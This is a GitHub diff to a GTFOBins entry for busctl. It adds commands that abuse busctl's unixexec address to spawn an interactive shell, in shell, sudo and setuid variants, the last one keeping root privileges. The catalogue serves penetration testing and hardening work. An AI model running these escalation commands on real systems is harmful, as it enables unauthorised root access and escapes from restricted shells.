File tree 1 file changed +8
-4
lines changed
1 file changed +8
-4
lines changed Original file line number Diff line number Diff line change 1
1
---
2
- description : This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
3
2
functions :
4
3
shell :
5
- - code : |
4
+ - description : This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
5
+ code : |
6
6
busctl --show-machine
7
7
!/bin/sh
8
+ - code : |
9
+ busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
8
10
sudo :
9
11
- code : |
10
- sudo busctl --show-machine
11
- !/bin/sh
12
+ sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
13
+ suid :
14
+ - code : |
15
+ ./busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'
12
16
---
You can’t perform that action at this time.
0 commit comments